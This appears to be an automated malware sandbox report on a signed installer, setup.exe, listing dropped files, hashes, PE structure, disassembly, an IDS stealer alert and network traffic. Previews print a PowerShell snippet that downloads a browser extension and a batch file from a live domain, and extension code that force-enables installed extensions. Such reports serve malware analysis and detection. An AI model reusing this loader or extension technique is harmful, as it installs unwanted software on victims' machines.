                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059201502342394
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgV5xWvjJudHaUtlGIc:20g8TmFplQS5ANybc
                                                                                                                                                                            MD5:48D34C3DD04BD24AAA81BB426AA70FD3
                                                                                                                                                                            SHA1:DE6744FBEFCA526D2360604CE0E4254F0B32728D
                                                                                                                                                                            SHA-256:4DB3A21458C65880AD6D3314DE71E717EF506A36F7B02E280C820743ABF6341B
                                                                                                                                                                            SHA-512:858F7DC6AE631781C13BFAFE4964A0087BED75797EF8688342CC6C2E2412DFB76D0E8301822B3B6A37C96E399785FC5DF3641445063A83AF4B1555EC7C131711
                                                                                                                                                                            Malicious:true
Preview:
param(
  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath
 ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator
 ,[alias("lineSep")]       [Parameter(Mandatory=$true)] [string] $msiPropLineSeparator
 ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath
 ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath
 ,[Parameter(Mandatory=$true)]
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):35840
                                                                                                                                                                            Entropy (8bit):4.0293324702446744
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:9o51AbfOcQ8k1jauBufvX4WvjJudHaUtlGP9kY9nh:+8TmFpgZNy0V
                                                                                                                                                                            MD5:A60D4DFD69846FCB0ED0D35ACDB2DE5C
                                                                                                                                                                            SHA1:4347421C592095AC7012D2660100027FA35EA91E
                                                                                                                                                                            SHA-256:B5553BDD13B5E551AE22204C9A8BDD95528C9A29DDA1960469B628762F50766B
                                                                                                                                                                            SHA-512:0C4F091958B15B13AB17805E2F9364CBB88158283F1A6B82A28B601C347CE184F1563C32A6979F063ED5BA05948092BE004073512741FBC93C7692729E6AD58E
                                                                                                                                                                            Malicious:true
Preview:
$domain = "https://secure.chromstera.com/cross/crx3dynamic";
$adv = "426";
$ver = "4.4";

$timestamp = ([DateTimeOffset](Get-Date)).ToUnixTimeSeconds();
$WebClient = New-Object System.Net.WebClient;
$location = $env:LOCALAPPDATA;

$WebClient.DownloadFile($domain + "/?adv=" + $adv + "&v=" + $ver + "&time=" + $timestamp, "$location\apps.crx");
$WebClient.DownloadFile($domain + "/config.php?v=" + $ver + "&time=" + $timestamp, "$location\Temp\config.bat");
# SIG # Begin signature block
#
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):81920
                                                                                                                                                                            Entropy (8bit):0.23122242023582953
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:tT4dTSkdMdlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDWOa5ZQZK:2sGlXHZAtatn3gOa5u
                                                                                                                                                                            MD5:BFE97814B4AEF39DE97FF0E91FEBF6E6
                                                                                                                                                                            SHA1:40469084CA3E46F5ECF0741355356BA410EAA591
                                                                                                                                                                            SHA-256:48EFF268A836C5758F8AEEECEBFCC3867DED1E65B4F03FBDC3C34A68B500A46C
                                                                                                                                                                            SHA-512:4706C028DC9CA6ECEAFEA3203CA68C190778F6F3CE6BE2083B94E33502A1D5B9C593392BCE4FD88A49BC58E03D7D518AFA945CD9CC52BF2718710F1517FDF059
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.10349372950319229
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOU9TrEQQRskSzgmWSfyWvbEQR4lSVky6l+1:50i8n0itFzDHFkTNQRskSpW6QQR4z+1
                                                                                                                                                                            MD5:AF75429D0D2630E39EA6B0CF9CB9FBDB
                                                                                                                                                                            SHA1:FE1A251A51825ADB241C40C0B6CCB4538CCA5133
                                                                                                                                                                            SHA-256:98C3080603C73890CCAF2FC4BBDFAD1A1F679972BED3DFC5CFD56170545D778B
                                                                                                                                                                            SHA-512:E189DCFF84A1AA542AD7C5AAB90CEE3563F90E2B4D309F607E1C78CE568367D5CCCA9C263EA83D7B3154649885D76915DA3C05E7992126C2F2AB7DD8A8B938DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):1.4778506022448366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:dbMubs4aFXzBT5lUkKvy9dlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDS:NMv/TLkeGlXHZAtatn3gOa5R
                                                                                                                                                                            MD5:6E923EF4AFB8BB8C0852F4635C6CE2A8
                                                                                                                                                                            SHA1:4F272659CD8830829A49F2FD467D5507D173FAC6
                                                                                                                                                                            SHA-256:64337AA249EBD51495A3837CB2EC1F7FB85DBEB5C044AB87C5ADFC124F6C898B
                                                                                                                                                                            SHA-512:42E734F29C1108335D716632DDD26C585469DB4BEAE899E31B9F0B1144F19248D153B0EC48AA5758A0EE2B070EEB992FEFC75046C23E5812136877DBB7785E5E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                            Entropy (8bit):4.7231140420608595
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:EW/C0sX0gk/hsu1wC6VAPk8yyWSD9kn+E8qqXY:r6XXChsu1wXAPk8Sic+Ev
                                                                                                                                                                            MD5:8CB0ACA2B1457CCDFFE28F9843BED9F5
                                                                                                                                                                            SHA1:DCFF694B3F2EAC4BCA4A6B96F32026D1CAD9FB83
                                                                                                                                                                            SHA-256:15DB2B5B55E74489DD4AD623328FBC10022BDE652C6099DD07D93F6263663C62
                                                                                                                                                                            SHA-512:07E99C3684C9952D1CD9AD42BA147B934023392B1ABD2FD688C585505C197FEF9EAA5804F6413D9BE8217F6C66CFD3F09E05D1ACE57230380C0F9B4AD333E670
                                                                                                                                                                            Malicious:false
Preview:
{
  "name": "Apps Helper",
  "description": "",
  "version": "1.0",
  "manifest_version": 3,
  "background": {
    "service_worker": "service.js",
    "type": "module"
  },
  "permissions": ["management", "background"]
}
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):103
                                                                                                                                                                            Entropy (8bit):4.609766703102874
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YUkOBLojM3BfnNTUcgLEHJlLDKcXpyYf:YXOBLow3htJTzD1pyYf
                                                                                                                                                                            MD5:3910AD193C862FFB7029097B93974D94
                                                                                                                                                                            SHA1:4C68DE8A20ECC80F76061F1D552C1F8C1AF015F0
                                                                                                                                                                            SHA-256:F95175FBBA42C31C2D4C68DB2CE857A570BDB146909CCF673E6FC647B6A474B3
                                                                                                                                                                            SHA-512:91A876FDB422EDA7F20F03C0C9B3454156DEC326E46BF69D0395A6885BAE0D1781D743E2C5CB0BD4D356DDEA1757ECA9DECDAD187271D5C5AFF011B125E70942
                                                                                                                                                                            Malicious:false
Preview:
chrome.management.onInstalled.addListener(info => {
  chrome.management.setEnabled(info.id, true);
});
                                                                                                                                                                            Process:C:\Windows\System32\timeout.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):4.4936933125951875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:hYFJAR+mQRKVxLZRtWcyn:hYFDaNZiRn
                                                                                                                                                                            MD5:1E2AC613338A8A1B2FAA866942CF7289
                                                                                                                                                                            SHA1:57BDF3D09C298EF7626707C60DFAC8E2E12B0405
                                                                                                                                                                            SHA-256:D676A2AE7C46320E1591C41EFF3848BBC49C6CD99B9B95FE4E43D6126E2799AA
                                                                                                                                                                            SHA-512:FA359C579CBC4994996634DBA18BA29187BC6742C34508D5C3F6530DC14D10807D6BBB8D95DF4225AE6F620B2B517069D0AC4DF8D757105D39FB6D302D570CFF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..Waiting for 5 seconds, press a key to continue ....4.3.2.1.0..
                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):6.734472037700318
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.81%
                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:setup.exe
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5:8aca54559265d2a9ad0a810c425c644f
                                                                                                                                                                            SHA1:39d22f9333c9682bb860cf644d66996f7a641666
                                                                                                                                                                            SHA256:af11a10ef1964b801f070d073cf89f3b4e6eecab2943af9cb011151df65ecfd2
                                                                                                                                                                            SHA512:58828b7069bc0bd4d731b6b8fb5ab67c0352b24b71cbe504c6a01381ea0a6b0e6f3cfc5adbf732d3f0a4b72692d30038586b91cb55a15e0c02628017813328b5
                                                                                                                                                                            SSDEEP:98304:lLKJzFgMQ0dgyNsqWGXwt2Hj8uYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvt:xKJzFgMhXQVJ1eBfM2NP6cr/Mxbq
                                                                                                                                                                            TLSH:A4968D21758AC537E67A01B16A2CDAAB61797EB20B7154CBB3DC3D6E0B704C21336E17
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."2..La..La..La".O`..La".I`J.La".J`..LaU.H`..LaU.O`..LaU.I`..La".H`..La".M`..La".K`..La..Ma..La..E`..La...a..La...a..La..N`..L
                                                                                                                                                                            Icon Hash:2f232d67b7934633
                                                                                                                                                                            Entrypoint:0x5e0862
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x64C23AA7 [Thu Jul 27 09:36:39 2023 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:6
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:21314122cd4542a6b9b297f52a87acbe
                                                                                                                                                                            Signature Valid:true
                                                                                                                                                                            Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                                                                                            Error Number:0
Not Before: 05/08/2023 10:08:47
Not After: 24/12/2023 11:38:55
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • E=admin@dragonboss.com, CN=Dragon Boss Solutions LLC, O=Dragon Boss Solutions LLC, L=Sharjah, S=Sharjah, C=AE
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:21C8F80B27367C1F3AD526555D6B895C
                                                                                                                                                                            Thumbprint SHA-1:925DE27A297B9C416C251935EFE64219F41EC0F5
                                                                                                                                                                            Thumbprint SHA-256:DE315EF07FF351A66A60C3E97C4E04D3E1B445E406C8F7A7E4F2C0765DDF8162
                                                                                                                                                                            Serial:72A7B646BA49E796A7EF012C
                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007F00190F11BDh
                                                                                                                                                                            jmp 00007F00190F09EFh
                                                                                                                                                                            mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop edi
                                                                                                                                                                            pop edi
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop ebx
                                                                                                                                                                            mov esp, ebp
                                                                                                                                                                            pop ebp
                                                                                                                                                                            push ecx
                                                                                                                                                                            ret
                                                                                                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                            call 00007F00190F0040h
                                                                                                                                                                            jmp 00007F00190F0B52h
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                            ret
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                            ret
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            mov dword ptr [ebp-10h], esp
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2fa454 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30a000 | 0x298c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x901268 | 0x2fe0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x334000 | 0x28bec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x29cfb0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x29d040 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x26dd60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x26c000 | 0x2ec | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2f77c0 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x26acb6 | 0x26ae00 | 6609ee5ad35366535f89171104fd9407 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x26c000 | 0x8f55a | 0x8f600 | 82a48c8eed166a4419b55b922166495d | False | 0.3128150201612903 | data | 4.603054902016689 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2fc000 | 0xd240 | 0x3c00 | 624471f60c55363d0bdc9e3921a90c7e | False | 0.2658203125 | data | 4.770105146258243 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x30a000 | 0x298c4 | 0x29a00 | 804290f0c11d503cf8d27bb1e4d0f331 | False | 0.13437851914414414 | data | 5.189659274032121 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x334000 | 0x28bec | 0x28c00 | 7704ec72484064d3d713def4a99cb43b | False | 0.4435151457055215 | data | 6.513339108201383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x30a910 | 0x13e | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors | English | United States | 0.25471698113207547
RT_BITMAP | 0x30aa50 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.03017241379310345
RT_BITMAP | 0x30b278 | 0x48a8 | Device independent bitmap graphic, 290 x 16 x 32, image size 0 | English | United States | 0.11881720430107527
RT_BITMAP | 0x30fb20 | 0xa6a | Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m | English | United States | 0.21680420105026257
RT_BITMAP | 0x31058c | 0x152 | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors | English | United States | 0.5295857988165681
RT_BITMAP | 0x3106e0 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.4875478927203065
RT_ICON | 0x310f08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0, 16 important colors | English | United States | 0.6216216216216216
RT_ICON | 0x311030 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colors | English | United States | 0.5794797687861272
RT_ICON | 0x311598 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0, 16 important colors | English | United States | 0.5080645161290323
RT_ICON | 0x311880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colors | English | United States | 0.5446750902527075
RT_ICON | 0x312128 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.3621951219512195
RT_ICON | 0x312790 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.4224413646055437
RT_DIALOG | 0x313638 | 0xac | data | English | United States | 0.7151162790697675
RT_DIALOG | 0x3136e4 | 0xcc | data | English | United States | 0.6911764705882353
RT_DIALOG | 0x3137b0 | 0x1b4 | data | English | United States | 0.5458715596330275
RT_DIALOG | 0x313964 | 0x136 | data | English | United States | 0.6064516129032258
RT_DIALOG | 0x313a9c | 0x4c | data | English | United States | 0.8289473684210527
RT_STRING | 0x313ae8 | 0x234 | data | English | United States | 0.4645390070921986
RT_STRING | 0x313d1c | 0x182 | data | English | United States | 0.5103626943005182
RT_STRING | 0x313ea0 | 0x50 | data | English | United States | 0.7375
RT_STRING | 0x313ef0 | 0x9a | data | English | United States | 0.37662337662337664
RT_STRING | 0x313f8c | 0x2f6 | data | English | United States | 0.449868073878628
RT_STRING | 0x314284 | 0x5c0 | data | English | United States | 0.3498641304347826
RT_STRING | 0x314844 | 0x434 | data | English | United States | 0.32899628252788105
RT_STRING | 0x314c78 | 0x100 | data | English | United States | 0.5703125
RT_STRING | 0x314d78 | 0x484 | data | English | United States | 0.39186851211072665
RT_STRING | 0x3151fc | 0x1ea | data | English | United States | 0.44081632653061226
RT_STRING | 0x3153e8 | 0x18a | data | English | United States | 0.5228426395939086
RT_STRING | 0x315574 | 0x216 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.46254681647940077
RT_STRING | 0x31578c | 0x624 | data | English | United States | 0.3575063613231552
RT_STRING | 0x315db0 | 0x660 | data | English | United States | 0.3474264705882353
RT_STRING | 0x316410 | 0x2e2 | data | English | United States | 0.4037940379403794
RT_GROUP_ICON | 0x3166f4 | 0x5a | data | English | United States | 0.7333333333333333
RT_VERSION | 0x316750 | 0x33c | data | English | United States | 0.4251207729468599
RT_HTML | 0x316a8c | 0x3835 | ASCII text, with very long lines (443), with CRLF line terminators | English | United States | 0.08298005420807561
RT_HTML | 0x31a2c4 | 0x1316 | ASCII text, with CRLF line terminators | English | United States | 0.18399508800654932
RT_HTML | 0x31b5dc | 0x8c77 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.08081426068578103
RT_HTML | 0x324254 | 0x6acd | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.10679931238798873
RT_HTML | 0x32ad24 | 0x6a2 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.3486454652532391
RT_HTML | 0x32b3c8 | 0x104a | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.2170263788968825
RT_HTML | 0x32c414 | 0x15b1 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.17612101566720692
RT_HTML | 0x32d9c8 | 0x205c | exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators | English | United States | 0.13604538870111058
RT_HTML | 0x32fa24 | 0x368d | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.10834228428213391
RT_MANIFEST | 0x3330b4 | 0x80f | XML 1.0 document, ASCII text, with CRLF, LF line terminators | English | United States | 0.40814348036839554
DLL | Import
KERNEL32.dll | CreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, GetProcessAffinityMask, GetModuleHandleA, GlobalMemoryStatus, ReleaseSemaphore, CreateSemaphoreW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T19:11:31.949011+0100 | 2829202 | ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA | 1 | 192.168.2.4 | 49734 | 104.21.8.139 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Oct 28, 2024 19:11:39.350802898 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                            Oct 28, 2024 19:11:39.742330074 CET49736443192.168.2.44.245.163.56
                                                                                                                                                                            Oct 28, 2024 19:11:39.742403984 CET443497364.245.163.56192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:02.525732040 CET4973080192.168.2.4151.101.130.133
                                                                                                                                                                            Oct 28, 2024 19:12:02.525732994 CET4973180192.168.2.4151.101.194.133
                                                                                                                                                                            Oct 28, 2024 19:12:02.532816887 CET8049730151.101.130.133192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:02.532880068 CET4973080192.168.2.4151.101.130.133
                                                                                                                                                                            Oct 28, 2024 19:12:02.532902002 CET8049731151.101.194.133192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:02.532944918 CET4973180192.168.2.4151.101.194.133
                                                                                                                                                                            Oct 28, 2024 19:12:15.743755102 CET49754443192.168.2.413.107.253.45
